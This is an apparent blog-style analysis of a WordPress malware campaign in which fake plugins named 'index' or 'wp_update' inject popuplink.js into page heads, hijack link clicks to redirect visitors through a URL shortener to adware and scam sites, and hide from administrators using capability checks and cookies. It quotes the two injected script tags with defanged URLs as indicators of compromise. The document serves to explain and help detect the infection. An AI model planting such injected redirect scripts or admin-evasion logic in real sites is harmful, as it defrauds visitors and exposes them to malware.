From many time, fake plugins are used to hack into websites. They are mostly added into head to load directly that scripts in websites. It is responsible for redirecting to scam and ad websites. It includes tiny URL shorter, which will then redirect to fake websites and can install adware. That fake plugin is called “index” or “wp_update”, and it contains malicious popuplink.js file. Infected pages typically have these two scripts in their head section.

1.

<script type=”text/javascript”> window.popuplink_cfg_field=”wp_cfg_index”;window.wp_cfg_index= {“url”:”hxxp:\/\/tiny[.]cc\/6zbfvy”,”switch”:false,”cookie”:{“name”:”index_is_shown”,”expires”:6000}}

</script>

2.

<script type=’text/javascript’ src=’hxxps://<hacked-site>/wp-content/plugins/index/popuplink.js?ver=4.9.7′></script>

Basically, it will load JavaScript from the URL which basically hooks the ‘onclick’ event for all links on a infected web page. As soon as you click on some link. it will redirect you to a shorted URL from which you will have to wait for 5 seconds to skip it and then it will redirect you to another webpage. The purpose behind that can be money earning because URL shortners pay money for landing into their page. Another motive can be distribution of malware which will cause a PC to turn into bot. Which then be used in massive attacks done by botnet or whats so called bot army. There can be many use of computer after it’s been hacked.

The plugins use the config.php file, where they store settings used by the plugin: the redirect URL, timeouts, settings that govern visibility of the plugin, and how the malicious script opens URLs.

It’s interesting to see how they have used a long list of user capabilities to detect the role of the current user and hide the plugin/malware presence if it’s a site administrator. It’s definitely not the most obvious and efficient way to do it. Most likely it’s done to make it less clear what the code does.

They use cookies to maintain access and prevent site admins from finding malware even if they log out from the sites. But actually it can only work until you don’t change the browser or clean the cookies. Incognito mode will also work just fine. Cookies are set in the way that user didnt suspect anything from it. Cookies prevent recurring injections / redirects for the same visitor for almost 100 minutes. That’s what actually stops the admin from accessing and stopping malware.

Most of the time, torrent and download websites are infected with this. So people tends to click on the website multiple times a day, which does both the job. Exploiting the computer and redirecting to adware.